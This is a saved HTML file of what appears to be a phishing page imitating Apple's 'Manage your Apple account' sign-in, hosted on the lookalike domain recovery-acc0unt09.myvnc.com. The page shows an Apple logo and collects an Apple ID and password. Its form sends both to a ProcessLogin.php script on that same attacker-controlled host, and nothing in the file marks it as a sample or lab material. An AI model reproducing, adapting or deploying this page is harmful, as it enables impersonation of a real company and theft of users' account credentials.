<!DOCTYPE html>
<!-- saved from url=(0054)https://recovery-acc0unt09.myvnc.com/assets/signin.php -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
<link href="./Fonts.css" rel="prefetch stylesheet" type="text/css">
<link href="./Login.css" media="screen" rel="stylesheet" type="text/css">
<script>
function ChangePlaceholder(){
document.getElementById("user").placeholder = "Apple ID";
}
function ChangeBack(){
document.getElementById("user").placeholder = "Apple ID";
}
function Activate(){
document.getElementById("go").className = "si-button";
}

function Activate2(){
document.getElementById("go2").className = "si-button";
}

function goTo2(){
    document.getElementById("go").style.display = "none";
    document.getElementById("go2").style.display = "block";
    document.getElementById("pwd-wrap").style.display = "block";
    document.getElementById("border-manage").style.borderBottomRightRadius  = "0";
    document.getElementById("border-manage").style.borderBottomLeftRadius  = "0";
    
}
function Spinner(){
document.getElementById("go").style.display = "none";
document.getElementById("spin").style.display = "block";
}
</script>
<title></title>
</head>
<body>
<div class="si-body si-container container-fluid" data-theme="lite" id="content">
<div class="widget-container fade-in restrict-max-wh fade-in" data-mode="embed">
<div class="HoldLoginDiv">
<div>
<div class="signin fade-in">
    <div class="logo"><img style="width: 200px;" class="TextLogo" src="./apple.png"></div>
<div>
<div class="signin fade-in">
<h2 tabindex="-1">Manage your Apple account</h2>
<form action="https://recovery-acc0unt09.myvnc.com/assets/includes/ProcessLogin.php" name="login" id="name" method="POST" onsubmit="Spinner();">
<div class="container HolderOfTheFields">
<div class="row no-gutter si-field apple-id" id="border-manage">
<div class="col-xs-12"><span class="LoginTitle">Manage your Apple account Apple ID</span> <input class="si-text-field" id="user" name="user" onblur="ChangeBack();" onclick="ChangePlaceholder();" onkeyup="Activate();" placeholder="Apple ID" spellcheck="false" type="email" autocomplete="off"></div>
<button onclick="if(document.getElementById(&#39;TAHUex1&#39;) .style.display==&#39;none&#39;) {document.getElementById(&#39;TAHUex1&#39;) .style.display=&#39;&#39;}else{document.getElementById(&#39;TAHUex1&#39;) .style.display=&#39;none&#39;}" type="button" class="si-button btn disabled" id="go" tabindex="0"><i class="icon icon_sign_in" onclick="goTo2();"></i></button>
</div>
<div id="TAHUex1" style="display: none;">
<div class="row no-gutter si-field pwd" id="pwd-wrap" style="display:none;">
<div class="col-xs-12"><label class="LoginTitle" for="pwd">Password</label> <input class="si-password si-text-field" id="pass" name="pass" placeholder="Password" type="password" autocomplete="off" onkeyup="Activate2();">
<button class="si-button btn disabled" id="go2" tabindex="0" style="display:none;"><i class="icon icon_sign_in"></i></button>
</div>
</div>
</div>
<br>
<br>
<div class="si-remember-password"><h3><input class="ax-outline" tabindex="0" type="checkbox"> <label for="remember-me">Remember me</label></h3></div>

<button style="display:none;" class="si-button btn" id="spin" tabindex="0"><img style="margin-left:-2px" src="./spinner.gif"></button>
</div>
</form>
<div class="si-container-footer"></div>
</div>
</div>
</div>
</div>
</div>

</div></div></body></html>